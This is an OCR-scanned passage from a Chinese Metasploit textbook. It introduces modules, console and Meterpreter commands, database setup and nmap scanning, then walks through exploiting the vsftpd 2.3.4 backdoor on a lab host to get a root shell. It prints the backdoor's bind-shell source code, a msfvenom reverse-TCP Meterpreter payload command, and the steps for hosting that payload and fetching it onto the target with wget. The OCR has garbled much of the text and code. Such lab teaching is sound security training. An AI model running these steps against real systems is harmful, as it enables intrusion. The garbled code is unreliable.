a 控制 台 界 面 : 最 为 普遍 也 最 为 流行 的 工作 方式 。 这 种 界面 提供 了 一 种 统一 的 工作 方式 来 

管理 Metasploit 的 所 有 功能 。 这 种 管理 方法 通常 也 被 认为 是 最 稳定 的 控制 方法 之 一 。 在 本 
书 中 ， 这 种 管理 方式 是 最 常用 的 。 

口 命令 行 界面 : 命令 行 界面 是 功能 最 为 强大 的 界面 ， 它 支持 对 渗透 模块 的 所 有 操作 (例如 

攻击 载荷 的 生成 ) 。 然 而 在 使 用 命令 行 界面 时 ， 记 住 每 一 条 命令 是 十 分 困难 的 。 


— 
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Q Armitage: Armitage 是 Raphael Mudge 编 写 的 一 个 充满 了 黑客 风格 的 GUI 界面 。Armitage 
提供 轻松 的 漏洞 管理 、 内 置 的 NMAP 扫 描 和 渗透 攻击 推荐 ， 并 通过 使 用 Cortana 脚 本 实现 


自动 化 功能 。 本 书 最 后 用 了 一 整 章 的 内 容 来 细致 地 讲解 Armitage 和 Cortana 脚 本 语言 。 


0 


community 。 


有 关 Metasploit Community 版 的 更 多 信息 


ENS 


1.7 ”使 用 Metasploit 进行 渗透 测试 
在 Kali Linux 建 立 完成 之 后 ， 准 备 使 用 Metasploit 开 展 我 们 的 第 一 个 渗透 测试 。 不 过 在 开始 这 


个 测试 之 前 ， 先 来 回顾 一 下 Metasploit 的 基本 功能 和 术语 。 


回顾 Metasploit 的 基础 知识 


成 功 运行 Metasploit 之 后 , 就 可 以 在 Metasploit 的 命令 控制 台 上 键入 help 命 令 , Metasploit 会 列 
出 所 有 可 以 使 用 的 命令 。 接 下 来 回顾 一 下 在 Metasploit 中 使 用 的 基本 术语 。 


请 访问 https://community.rapid7.com/ 
community/Metasploit/blog/2011/12/21/Metasploit-tutorial-an-introduction-to-Metasploit- 


O 渗透 模块 (exploit ): 这 是 一 段 程序 ， 运 行 时 会 利用 目标 的 安全 漏洞 进行 攻击 。 
O 攻击 载荷 模块 (payload ) : 在 成 功 对 目标 完成 一 次 渗透 之 后 ， 这 段 程 序 开始 在 目标 计算 
机 上 运行 。 它 能 帮助 我 们 在 目标 系统 上 获得 需要 的 访问 和 行动 权限 。 

OQ 辅助 模块 ( auxiliary ) : 包含 了 一 系列 的 辅助 支持 模块 ， 包 括 扫描 模块 、fuzz 测 试 漏洞 发 
掘 模块 、 网 络 协议 欺骗 以 及 其 他 一 些 模 块 。 
O 编码 器 模块 (encoder ) : 编码 器 模块 通常 用 来 对 我 们 的 攻击 模块 进行 代码 混淆 ， 来 光 过 
目标 安全 保护 机 制 的 检测 。 目 标 安全 保护 机 制 包括 杀毒 软件 和 防火 墙 等 。 

口 Meterpreter: Meterpreter 是 一 种 使 用 内 存 技术 的 攻击 载荷 ,可 以 注入 到 进程 之 中 。 它 提供 


了 各 种 可 以 在 目标 上 执行 的 功能 ， 从 而 成 为 了 最 受 欢 迎 的 攻击 载 集 。 
现在 来 回顾 一 下 本 章 中 Metasploit 将 会 用 到 的 基本 命令 。 下 表 给 出 了 这 些 命令 的 使 用 示例 。 


A A 
命令 


用 法 


示 例 


use [Auxiliary/Exploit/ 
Payload/Encoder] 


选择 一 个 指定 的 模块 并 使 其 开始 
工作 


msf»use 
exploit/unix/ftp/vsftpd 234 backdoor 
msf»use 
auxiliary/scanner/portscan/tcp 


show [exploits/payloads/ 
encoder/auxiliary/options] 


显示 可 用 的 特定 功能 的 模块 


msf>show payloads 
msf» show options 


set [options/payload] 


给 某 个 特定 对 象 赋值 


msf»set payload 
windows/meterpreter/reverse tcp 
msf»set LHOST 192.168.10.118 
msf» set RHOST 192.168.10.112 
msf» set LPORT 4444 

msf» set RPORT 8080 
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A ^ 
S 令 


用 法 


CE) 
m 例 


setg [options/payload] 


给 某 个 对 象 赋值 的 同时 设 定 作用 
域 为 全 局 ， 在 模块 进行 切换 的 时 
候 ， 该 对 象 的 值 不 会 被 改变 


msf>setg RHOST 192.168.10.112 


mE 在 设置 一 个 辅助 模块 需要 的 所 有 | msf>run 
选项 之 后 ， 启 动 该 辅助 模块 
exploit 启动 一 个 渗透 模块 msf>exploit 
back 让 消 当前 选择 的 模块 并 且 退 回 到 msf(ms08 067 netapi)»back 
上 一 级 命令 窗口 mef> 
Info 列 出 相关 模块 的 信息 mef»info 
exploit/windows/smb/ms08 067 netapi 
msf(ms08 067 netapi)»info 
Search 搜索 符合 条 件 的 特定 模块 msf»search hfs 
check 检查 某 个 特定 目标 是 否 易 受 攻击 “| msf>check 
Sessions 列 出 当前 可 用 的 会 话 msf»sessions [session number] 


以 下 是 Meterpreter 的 一 些 命 令 。 


Meterpreter 命令 


A B 


示 A 


sysinfo JJ bx SU sss E meterpreter»sysinfo 
ifconfig 列 出 被 渗透 主机 的 网 络 接口 meterpreter>ifconfig 
meterpreter>ipconfig (Windows) 
Arp 列 出 目标 主机 ARP 缓 存 地 址 的 卫 | meterpreter>arp 
地 址 和 MAC 地 址 
background 将 一 个 处 于 激活 状态 的 会 话 发 送 meterpreter»background 
到 后 台 
shell 获取 目标 主机 的 一 个 cmd shell meterpreter»shell 
getuid 获取 当前 用 户 乡 昌 节 meterpreter»getuid 
getsystem 提升 权限 ， 获 取 系 统 级 权限 meterpreter>getsystem 
getpid 获取 Meterpreter 会 话 在 目标 主机 meterpreter>getpid 
上 注入 进程 的 进程 号 
ps 列 出 目标 主机 上 运行 的 所 有 进程 | meterpreter»ps 


0 


如 果 是 第 一 次 接触 Metasploit， 可 访问 http://www.offensive-security.com/metasploit- 
unleashed/Msfconsole Commands 获 取 关 于 基本 命令 的 更 多 信息 。 


1.8 使 用 Metasploit 进行 渗透 测试 的 优势 


在 开始 渗透 之 旅 之 前 ， 必 须 弄 清楚 为 什么 要 使 用 Metasploit 工 具 来 替代 手动 渗透 技术 。 是 因 
为 那 看 起 来 很 酷 的 黑客 风格 的 控制 终端 使 我 们 显得 很 专业 , 还 是 有 什么 其 他 的 原因 ?与 传统 的 手 


16 第 1 章 走 近 Metasploit 渗 透 测 试 框架 


动 技术 相 比 ， 选 择 Metasploit 的 原因 主要 有 以 下 几 点 。 


1.8.1 源 代 码 的 开放 性 


选择 Metasploit 的 主要 理由 之 一 就 是 其 源 代 码 的 开放 性 以 及 积极 快速 的 发 展 。 世 界 上 还 有 许 
多 非常 优秀 的 商业 版 渗透 测试 工具 ， 但 是 Metasploit 对 用 户 开 放 它 的 源 代 码 ， 并 且 人 允许 用 户 添加 
自己 的 自 定 义 模 块 。 虽 然 Metasploit Pro 版 本 是 收费 的 ， 但 如 果 以 学 习 为 目的 ， 可 以 将 Metasploit 
Community 版 作为 首选 。 


1.8.2 ”对 大 型 网 络 测试 的 支持 以 及 便利 的 命名 规则 


Metasploit 框 架 十 分 易 用 ， 不 过 这 里 的 易 用 性 是 指 Metasploit 中 命令 的 简单 命名 约定 。 它 为 执 
行 大 规模 的 网 络 渗透 测试 提供 了 便利 。 设 想 这 样 一 个 场景 ， 我 们 面 对 的 网 络 包含 了 整整 200 个 系 
统 。 当 使 用 Metasploit 时 ， 你 可 以 对 整个 目标 网 络 进 行 自动 化 渗透 测试 ， 而 不 必 一 台 一 台地 逐个 
测试 。 指 定 参 数值 后 ， 例 如 子 网 subnet) 和 无 类 别 域 际 路 由 (Classless Inter Domain Routing, 
CIDR ), Metasploit 就 可 以 自动 对 所 有 计算 机 进行 测试 以 发 现 目标 上 的 漏洞 ,而 如 果 采 用 手动 测试 ， 
就 需要 分 别 对 200 个 系统 逐个 测试 。 因 此 使 用 Metasploit 渗 透 框架 可 以 节省 大 量 的 时 间 和 精力 。 


1.8.3 灵活 的 攻击 载荷 模块 生成 和 切换 机 制 


最 为 重要 的 是 ， 在 Metasploit 中 切换 攻击 载荷 模块 十 分 容易 一 一 它 提 供 了 set payload 命 令 
来 快速 切换 攻击 载荷 模块 。 因 而 在 Metasploit 中 从 Meterpreter 终 端 或 者 shell 控 制 行 可 以 十 分 简单 地 
转换 到 具体 的 操作 ， 例 如 添加 一 个 用 户 ， 获 得 远程 桌面 控制 。 在 命令 行 中 输入 msfvenom 也 可 以 
很 容易 地 创建 一 个 人 工 攻击 代码 程序 。 


1.8.4 干净 的 通道 建立 方式 


Metasploit 可 以 在 目标 计算 机 上 不 留 痕迹 地 建立 控制 通道 ， 而 一 个 自 定义 编码 的 渗透 模块 在 
建立 控制 通道 时 却 可 能 会 引起 系统 的 骨 溃 。 这 确实 是 一 个 重要 的 问题 , 在 这 种 情况 下 ,我 们 都 知 
道 系统 是 不 会 立刻 重新 启动 的 。 


设想 这 样 一 个 场景 : 我 们 已 经 拿 下 了 一 个 Web 服 务 器 ， 在 准备 建立 通道 的 时 候 目 标 服务 却 崩 
溃 了 。 这 台 服 务 器 的 计划 维护 时 间 是 在 50 天 以 后 。 那 现在 该 做 什么 呢 ? 熬 过 接 下 来 的 530 天 直到 目 
标 服 务 再 次 启动 ,以 便 再 一 次 入侵 ? 再 者 ， 如 果 再 次 启动 的 时 候 ， 目标 系统 的 漏洞 已 经 修复 了 怎 
么 办 ? 我 们 只 有 了 上 暗自 郁 间 了 。 因 此 ， 更 好 的 办 法 就 是 使 用 Metasploit 框 架 。Metasploit 在 建立 控制 
通道 方面 极为 优秀 ， 同 时 还 提供 了 大 量 的 后 渗透 模块 ， 例 如 persistence 命 令 就 可 以 建立 一 个 
对 目标 服务 器 的 持久 控制 通道 。 
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1.8.5 EET 


Metasploit 提 供 了 一 个 漂亮 的 图 形 化 管理 界面 ， 男 外 也 对 第 三 方 图 形 化 管理 软件 ( 例如 
Armitage ) 提供 了 管理 界面 。 这 些 界面 极 大 地 简化 了 渗透 测试 的 工作 , 例如 易于 切换 的 工作 平台 、 
漏洞 管理 、 单 击 鼠 标 即 可 完成 的 渗透 功能 。 本 书 的 后 面 几 童 将 详细 讨论 这 些 环 境 。 


TT 


1.9 对 未 知 网 络 的 渗透 测试 


回顾 完 Metasploit 的 基本 操作 ， 该 开始 Metasploit 渗 透 之 旅 了 。 在 这 里 将 测试 一 个 了 下地 址 ， 并 
尝试 收集 与 目标 IP 相 关 的 信息 。 我 们 将 会 按照 之 前 讲 到 的 渗透 测试 的 各 个 阶段 来 完成 这 个 任务 。 


1.9.1 假设 


假设 要 对 一 个 未 知 网络 进 行 黑 盒 测 试 , 并 且 已 经 完成 了 前 期 交互 阶段 的 工作 。 测试 范围 是 一 
个 单独 的 IP 地 址 , 事先 我 们 没有 得 到 该 目标 卫 地 址 的 任何 相关 信息 。 我 们 将 要 使 用 Kali Linux 操 作 
系统 来 完成 这 次 任务 。 这 个 操作 系统 中 包含 了 很 多 优秀 的 安全 测试 工具 , 是 当前 用 于 安全 渗透 方 
面 最 为 流行 的 Linux 操 作 系 统 。 


出 于 学 习 目 的 ,我 们 在 演示 中 使 用 了 两 个 Metasploitable 2 系统 和 一 个 Windows 
Server 2012 系 统 。 


1.9.2 ”信息 收集 


正如 前 文 所 介绍 的 那样 , 在 信息 收集 阶段 应 该 围绕 着 目标 收集 尽 可 能 多 的 相关 信息 。 主 动 扫 
描 和 被 动 扫 描 包 括 了 端口 扫描 、banner 获 取 ， 以 及 根据 被 测试 的 目标 特点 选择 的 各 种 其 他 扫描 方 
式 。 当 前 场景 中 ,我 们 要 测试 的 目标 是 一 个 IP 地 址 。 因 此 在 这 次 测试 中 可 以 跳 过 被 动 扫 描 ， 直 接 
采用 主动 扫描 的 方法 开始 收集 信息 。 

我 们 采用 对 内 部 目标 踩点 的 方法 ， 主 要 包括 端口 扫描 技术 、banner 获 取 技 术 、ping 扫 描 技 术 
(目的 是 验证 目标 主机 是 否 在 线 ) 以 及 服务 扫描 技术 。 

NMAP 被 证 明 是 最 适合 进行 内 部 日 标 踩点 的 工具 之 一 。 由 NMAP 生 成 的 报告 可 以 轻松 地 导入 
到 Metasploit 中 。Metasploit 内 置 了 数据 库 功 能 ， 利 用 这 个 功能 我 们 就 能 在 Metasploit 中 执行 NMAP 
扫描 ， 并 将 扫描 结果 存储 在 数据 库 中 。 


有 关 NMAP 扫 描 的 更 多 信息 ， 请 访问 http:/nmap.org/bennieston-tutorial/。 
€» 推荐 一 本 关于 NMAP 的 极为 优秀 的 图 书 : http;//www.packtpub.com/networking- 


and-servers/nmap-6-network-exploration-and-security-auditing-cookbook。 
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1.10 在 Metasploit 中 使 用 数据 库 
将 渗透 测试 的 结果 保存 起 来 是 一 个 不 错 的 选择 。 这 将 帮助 我 们 建立 关于 这 次 渗透 测试 的 知识 


Payr 


库 。 为 了 实现 这 个 功能 ， 可 以 使 用 Metasploit 内 置 的 数据 库 。 将 Metasploit 与 数据 库 建立 连接 可 以 


加 快 搜索 的 速度 ， 缩 短 响应 的 时 间 。 下 图 给 出 了 一 个 没有 与 数据 库 连 接 时 的 情形 。 


msf > search ping 
Module database cache not built yet, using slow search 


如 果 需 要 使 用 数据 库 ， 可 以 使 用 如 下 命令 启动 Metasploit 的 数据 库 服务 : 


root@kali:~# service postgresql start 
root@kali:~#msfdbinit 


^ service postgresql statrt 完 成 了 PostgresoLaatabase 服 务 的 初始 化 ， 命 fip 
msfdqbinit 完 成 了 Metasploit 中 PostgreSQL 数 据 库 的 创建 和 初始 化 工作 。 


数据 库 成 功 创建 并 初始 化 之 后 ， 就 可 以 使 用 如 下 命令 来 启动 Metasploit: 


root@kali:~#msfconsole 


该 命令 会 启动 Metasploit， 启 动 以 后 的 界面 如 下 图 所 示 。 


+ * 
aa u u THEHHHHEAE A + u HH 
HERO) n N A THHHHHHHHHHE / /上 NA、 HH 


VHEHHHHELEAAHAHAI M IHE EEEEÉALALAHAAAA A AE E EE EELEE EEEE EALE AI EE AEEHALAAAAAI I II III 
FERETHETEHETEHETRERERERETHHHEHE E EE ERE EHEHIHIHHHEH E ETE EH EH EHIHHHHE E E EH EHIHIHHHHE E EH EH HIHHHHEHE EE RH HHHIHEE E E BEBE RH EH HH G 
K WAVE 4 ######## SCORE 31337 fHHEHHHEHHBHBHBHHBHHHEHHHHHHHHHHHHHHHHE HIGH FFFFFFFF # 
FEPHHBHHBHHEEEEE RE REEHE HELL IEEE EHHHEHHHHHLL IL EH EH EHE EHHEHHHLL LL EE THHHHHHHHE I E HHHHHHEHEHE E HEURE 
http://metasploit.pro 


Payload caught by AV? Fly under the radar with Dynamic Payloads in 
Metasploit Pro -- learn more on http://rapid7.com/metasploit 


z[ metasploit v4.11.5-2016010401 


] 
+ -- --=[ 1519 exploits - 875 auxiliary - 257 post ] 
+ -- --=[ 437 payloads - 37 encoders - 8 nops ] 
+ -- --z[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


msf > db status 
[*] postgresql connected to msf 
msf » 


现在 可 以 使 用 如 下 命令 来 查看 数据 库 的 状态 : 


msf»db status 


上 面 这 条 命令 用 来 检查 是 否 与 数据 库 建立 了 连接 , 以 及 该 数据 库 是 否 做 好 了 保存 扫描 结果 的 


准备 。 上 图 显示 已 经 与 数据 库 建立 了 连接 ， 而 且 它 会 保存 所 有 的 结果 。 
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下 一 步 ， 如 果 希 望 新 连接 一 个 数据 库 而 不 是 使 用 默认 数据 库 ， 可 以 使 用 如 下 命令 ; ET 
db connect 


输入 这 个 命令 只 会 显示 出 该 命令 的 使 用 方法 ， 下 面 的 屏幕 截图 给 出 了 执行 该 命令 的 效果 。 


msf > db connect 

[*] Usage: db connect «user:pass»Q«host:port»/«database» 
[*] OR: db connect -y [path/to/database.yml] 

[*] Examples: 

[*] db connect user(metasploit3 

[*] db connect user:pass(03192.168.0.2/metasploit3 

[*] db connect user:pass192.168.0.2:1500/metasploit3 
msf » db driver 

[*] Active Driver: postgresql 

[*] Available: postgresql, mysql 


为 了 能 连接 到 数据 库 ， 我 们 在 ab_connect 命 令 后 面 输入 用 户 名 、 密 码 、 端 口号 以 及 数据 库 
名 称 。 


来 看 看 其 他 核心 数据 库 操作 命令 是 如 何 工作 的 。 下 表 有 助 于 了 解 这 些 数据 库 命令 。 


命 令 用 途 
db connect 用 来 与 默认 数据 库 之 外 的 数据 库 交 互 
db export 用 来 将 数据 库 中 保存 的 数据 导出 ， 用 来 生成 测试 报告 或 者 用 来 导入 到 其 他 安全 工具 中 
db nmap 用 来 使 用 NMAP 软 件 对 目标 进行 扫描 ， 并 将 结果 保存 到 Metasploit 的 数据 库 中 
db status 用 来 检查 是 否 建 立 了 与 数据 库 的 连接 
db. disconnect 用 来 从 指定 的 数据 库 中 断 开 
db import 用 来 向 数据 库 中 导入 来 自 其 他 扫描 工具 (例如 Nessus、NMAP 等 ) 的 扫描 结果 
db rebuild cache 用 来 重新 建立 缓存 ， 主 要 目的 是 使 用 新 的 配置 末代 之 前 缓存 文件 中 错误 或 者 过 时 的 配置 


现在 我 们 已 经 了 解 了 与 数据 库 相 关 的 命令 ， 接 下 来 就 在 目标 上 执行 一 次 NMAP 扫 描 。 


msf > db nmap -sV -p 21,22,25,80,110,443,445 192.168.10.112 

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-21 07:41 EDT 

[*] Nmap: Nmap scan report for 192.168.10.112 

[*] Nmap: Host is up (0.00080s latency). 

[*] Nmap: PORT STATE SERVICE VERSION 

[*] Nmap: 21/tcp open ftp I vsftpd 2.3.4 

[*] Nmap: 22/tcp open ssh OpenSSH 4.7pl Debian 8ubuntul (protocol 2.0) 

[*] Nmap: 25/tcp open smtp Postfix smtpd 

[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

[*] Nmap: 110/tcp closed pop3 

[*] Nmap: 443/tcp closed https 

[*] Nmap: 445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 

[*] Nmap: MAC Address: 08:00:27:9B:25:A1 (Cadmus Computer Systems) 

[*] Nmap: Service Info: Host: metasploitable.localdomain; 0Ss: Unix, Linux; CPE: cpe:/o:linux:linux 
kernel 

[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submi 
t/. 

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds 

msf » 
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在 上 面 的 截图 中 ， 我 们 使 用 ab - a 自动 保存 在 Metasploit 的 数据 库 中 o T 
图 最 上 方 的 那 条 命令 使 用 了 -sv 参数 ， 这 表示 NMAP 要 对 目标 主机 的 服务 进行 扫描 ， 参 数 -P 表 示 
要 对 目标 的 端口 进行 扫描 。 


由 图 可 知 ， 目 标 IP 地 址 的 计算 机 上 开放 了 大 量 端口 。 下 面 使 用 services 命 令 列 出 在 目标 端 
上 运行 的 服务 ， 结 果 如 下 图 所 示 。 


msf > services 

Services 

host port proto name state info 

192.168.10.112 21 tcp ftp open vsftpd 2.3.4 

192.168.10.112 22 tcp ssh open OpenSSH 4.7pl Debian 8ubuntul protocol 2.0 
192.168.10.112 25 tcp smtp open Postfix smtpd 

192.168.10.112 $80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2 
192.168.10.112 110 tcp pop3 closed 

192.168.10.112 443 tcp https closed 

192.168.10.112 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 


由 图 可 知 ， 在 目标 计算 机 上 运行 着 大 量 的 服务 。 可 以 使 用 services -u 命 令 对 当前 运行 的 
服务 进行 过 滤 ， 过 滤 的 结果 如 下 图 所 示 。 


msf > services -u 

Services 

host port proto name state info 

192.168.10.112 21 tcp ftp open  vsftpd 2.3.4 

192.168.10.112 22 tcp ssh open OpenSSH 4.7pl Debian 8ubuntul protocol 2.0 
192.168.10.112 25 tcp smtp open Postfix smtpd 

192.168.10.112 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2 
192.168.10.112 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 


也 可 以 使 用 hosts 命 令 列 出 数据 库 中 所 有 的 主机 ， 结 果 如 下 图 所 示 。 


Hosts 
address mac name os name os flavor os sp purpose info comments 
192.168.10.112 08: 00:27:9b:25:a1 Linux server 


qp 有 关 数 据 库 的 更 多 信息 ,请 访问 https://www.offensive-security.com/metasploit- 


unl eashed/using-databases/。 


1.11 威胁 建 模 


通过 信息 收集 , 可知 目 标 计 算 机 上 运行 着 大 量 服务 。 主 机 信息 也 告诉 我 们 目标 的 操作 系统 是 
基于 Linux 的 。 现 在 在 Metasploit 中 查找 一 个 漏洞 对 应 的 渗透 模块 。 
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msf > services -u 


Services 


host port proto name state info 

192.168.190.112 21 tcp ftp open vsftpd 2.3. 

192.168.190.112 22 tcp ssh open OpenSSH 4. Ln Debian Subuntui protocol 2.0 
192.168.190.112 25 tcp smtp open Postfix smtpd 

192.1658.10.112 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2 
192.168.10.112 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 


msf > search vsftpd 


Matching Modutes 


Name Disclosure Date Rank Description 


exploit/unix/ftp/vsftpd 234 backdoor 2011-07-03 excellent  VSFTPD v2.3.4 Backdoor Command 
Execution 


msf use exploit/unix/ftp/vsftpd 234 backdoor 
maf exploit(wvsftpd 234 backdoor) > E 


我 们 已 经 在 Metasploit 中 找到 了 对 应 服务 漏洞 的 渗透 模块 ， 之 后 的 渗透 细节 可 以 查看 
http://www.securityfocus.com/bid/48539/discuss 和 http://scarybeastsecurity.blogspot.in/211/7/alert-vsft 
pd-download-backdoored.html 两 个 页 面 。 我 们 可 以 轻而易举 地 发 现 这 个 软件 是 存在 漏洞 的 ， 

有 一 个 可 以 触发 远程 代码 执行 的 后 门 。 
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在 对 威胁 建 模 之 后 ， 可 以 使 用 exploit /unix/ftp/veftpd_234_packdoor 命 令 在 
Metasploit 中 载 入 相 匹 配 的 模块 ， 并 使 用 info 命 令 对 漏洞 细节 进行 分 析 ， 结 果 如 下 图 所 示 。 


msf > use exploit/unix/ftp/vsftpd 234 backdoor 
msf exploit(vsftpd 234 backdoor) » info 


Name: VSFTPD v2.3.4 Backdoor Command Execution 
Module: exploit/unix/ftp/vsftpd 234 backdoor 
Platform: Unix 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Disclosed: 2011-07-03 


Provided by: 
hdm «xghdm.io» 
MC «mcQmetasploit.com» 


Available targets: 
Id Name 


© Automatic 


Basic options: 
Name Current Setting Required Description 
RHOST yes The target address 
RPORT 21 yes The target port 


Payload information: 
Space: 2000 
Avoid: 0 characters 


Description: 
This module exploits a malicious backdoor that was added to the 
VSFTPD download archive. This backdoor was introduced into the 
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
according to the most recent information available. This backdoor 
was removed on July 3rd 2011. 


References: 
http: //www.osvdb.org/73573 


http://pastebin.com/AetT9sS5 
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html 


从 上 图 的 开始 处 一 直到 最 后 Description 部 分 的 日 期 为 止 ， 都 对 这 个 vsftpa 漏 洞 的 渗透 模 
进行 了 详细 的 介绍 。 
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1.12.1 攻击 过 程 


对 VSFTPD 2.3.4 的 攻击 其 实 就 是 通过 向 21 端 口 发 送 一 个 特定 字 节 的 序列 来 触发 恶意 的 
Vsf_sysutil_extra() ;水 数 。 一 旦 成 功 执行 ， 就 会 在 系统 的 6200 端 口 打 开 一 个 后 门 。 


1.12.2 ”漏洞 渗透 的 过 程 
下 面 的 截图 给 出 了 导致 漏洞 出 现 的 代码 ， 这 样 可 以 帮助 我 们 更 好 地 理解 。 


else if((p str-»p buf[i]--0x3a) 
&& (p str-»p buf[i*1]--0x29)) 
1 

vsf sysutil extra(); 


} 


可 以 清楚 地 看 到 ， 如 果 网 络 缓冲 区 中 的 字 节 与 后 门 序列 中 的 0x3a (就是; ) 和 0x29 相 匹配 ， 
那么 恶意 的 函数 就 会 被 触发 。 此 外 ， 如 果 我 们 仔细 研究 这 个 函数 的 详细 内 容 , 会 看 到 它 的 具体 实 
现 细节 ， 如 下 所 示 。 


pastebin.com 


g vs 


« 
bene PASTEBIN 中 new paste trends API tools faq 


-int 

-vsf_sysutil_extra(void) 

g 

- int fd, rfd; 

- struct sockaddr_in sa; 

- if((fd = socket(AF INET, SOCK STREAM, 0)) < 0) 

- exit(1); 

- memset(&sa, 0, sizeof(sa)); 

- sa.sin family - AF INET; 

- sa.sin port = htons(6200); 

- sa.sin addr.s addr = INADDR ANY; 

- if((bind(fd,(struct sockaddr *)&sa, 

- sizeof(struct sockaddr))) < 0) exit(1); 

- if((listen(fd, 100)) -- -1) exit(1); 

- for(;;) 

EN! 
rfd - accept(fd, 0, 0); 
close(0); close(1); close(2); 
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2); 
execl("/bin/sh","sh",(char *)0); 

- 】} 

E 
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sa.sin_port=6200 将 6200 作 为 后 门 服务 的 端口 ， 通 过 execl ("/bin/sh","sh", (char *)0); 
语句 执行 发 送 到 目标 服务 的 命令 。 


qp 有 关 渗 透 模块 的 更 多 信息 ， 请 访问 https://www.rapid7.com/db/modules/exploit/ 
unix/ftp/vsftpd 234 backdoor/。 
1.12.3 ”渗透 模块 和 后 渗透 模块 


获取 了 足够 多 的 关于 漏洞 的 信息 之 后 , 现在 来 对 目标 系统 进行 渗透 。 在 对 目标 系统 进行 渗透 
之 前 , 先 来 查看 一 下 需要 设置 的 选项 。 这 需要 运行 一 个 显示 选项 的 命令 , 显示 的 结果 如 下 图 所 示 。 


= 


msf exploit(vsftpd 234 backdoor) > show options 


Module options (exploit/unix/ftp/vsftpd 234 backdoor): 


RHOST yes The target address 
RPORT 21 yes The target port 


Exploit target: 


Id Name 


© Automatic 


msf exploit(vsftpd 234 backdoor) > set RHOST 192.168.10.112 
RHOST => 192.168.10.112 

msf exploit(vsftpd 234 backdoor) > set RPORT 21 

RPORT z» 21 

msf exploit(vsftpd 234 backdoor) » show payloads 


Compatible Payloads 


Name Disclosure Date Rank Description 


cmd/unix/interact 


msf exploit(vsftpd 234 backdoor) » set payload cmd/unix/interact 


payload => cmd/unix/interact 
f exploit(vsftpd 234 backdoor) > J 


这 个 模块 只 有 两 个 选项 : RHOsST 和 RPORT。 将 RHosT 设 置 为 目标 主机 的 卫 地 址 ， 将 RPORT 设 
置 为 21， 这 就 是 有 漏洞 的 FTP 服 务 器 所 使 用 的 端口 。 


接 下 来 可 以 使 用 show payloaqs 命 令 查看 适合 特定 渗透 模块 使 用 的 攻击 载荷 。 在 这 里 我 们 
只 能 看 到 一 个 可 以 使 用 的 攻击 载荷 ， 它 就 是 cmdq/unix/interact。 使 用 命令 set payload 
cmd/unix/interact 来 指定 这 个 攻击 载荷 。 


现在 继续 攻击 。 对 系统 进行 渗透 ， 过 程 如 下 图 所 示 。 
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msf exploit(vsftpd 234 backdoor) > exploit 


Banner: 220 (vsFTPd 2.3.4) 

USER: 331 Please specify the password. 

Backdoor service has been spawned, handling... 

| UID: uid=0(root) gid-O(root) 

[*] Found shell. I 

[*] Command shell session 1 opened (192.168.10.118:55381 -> 192.168.10.112:6200) at 2016-03-21 07:50 
:17 -0400 


[* 
[* 


whoami 
root 
pwd 

/ 

L| 


干 得 漂亮 ! 我 们 现在 已 经 获得 了 目标 系统 的 root 权 限 。 接 下 来 该 干什么 呢 ? 现在 只 是 获取 了 
目标 的 一 个 shell 控 制 ， 下 面 来 试 着 掌握 更 强大 的 控制 方式 ， 这 一 点 可 以 通过 将 shell 控 制 升 级 为 
Meterpreter 命 令 行 来 实现 。 

我 们 需要 创建 一 个 面向 客户 的 攻击 载荷 ， 然 后 将 这 个 攻击 载荷 上 传 到 目标 系统 中 执行 , 这 样 
就 可 以 获得 一 个 目标 系统 的 Meterpreter 命 令 行 。 好 了 ， 接 下 来 就 开始 实施 这 一 计划 吧 。 


root@mm:~# msfvenom -p linux/x86/meterpreter/reverse tcp LHOST-192.168.10.118 LPORT-44 
44 -f elf »backdoor.elf I 

No platform was selected, choosing Msf::Module::Platform::Linux from the payload 

No Arch selected, selecting Arch: x86 from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 71 bytes 


root@mm: ~# ll 


可 以 使 用 上 图 所 示 的 ms fvenom 命 令 创建 一 个 Meterpreter 攻 击 载荷 ， 这 个 命令 功能 十 分 强大 。 
参数 -p 指 定 需要 使 用 的 攻击 载 千 ，LHosT 指 定 我 们 自己 计算 机 的 耳 地 址 ，LPORT 指 定 我 们 自己 的 端 
口 。ourbackdoorelf 文 件 将 会 在 目标 计算 机 上 连接 刚才 我 们 设 定 的 耳 地 址 和 端口 , 并 提供 一 个 目标 计 
算 机 上 的 Meterpreter 权 限 。 人 参数 -f 定 义 了 输出 类 型 ，elf 是 一 种 基于 Linux 类 型 系统 的 默认 扩展 名 。 


现在 我 们 仅仅 拥有 目标 系统 上 的 一 个 shell 控 制 ， 要 将 backdoorelf 上 传 到 目标 系统 可 不 是 一 件 简 
单 的 事 。 首 先 ， 我 们 要 启动 自己 计算 机 上 的 Apache 服 务 ， 然 后 将 backdoorelf 文 件 放置 到 服务 器 中 。 


rootemm:-4 service apache2 start 
rootGmm:-£ mv backdoor.elfb /var/www/html/ 
rootemm: £s J 


接 下 来 使 用 命令 service apache2 start 启 动 Apache 服 务 ， 然 后 将 这 个 后 门 文件 放置 到 Apache 
服务 器 的 默认 文档 根 目录 中 。 这 样 就 可 以 让 目标 系统 从 我 们 的 计算 机 中 下 载 这 个 木马 文件 了 。 
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wget http://192.168.10.118/backdoor.elf 
--03:43:37-- Mhttp://192.168.10.118/backdoor.elf 


Connecting to 192.168.10.118:80... connected. 


HTTP request sent, awaiting response... 200 OK 
Length: 155 


OK 
55.91 MB/s 


03:43:37 (55.91 MB/s) - `backdoor.elf' saved [155/155] 


接 下 来 就 可 以 像 上 


=> "backdoor.elf' 


100% 


图 一 样 使 用 wget 命 令 下 载 这 个 文件 。 为 了 让 Metasploit 能 和 被 渗透 的 计算 


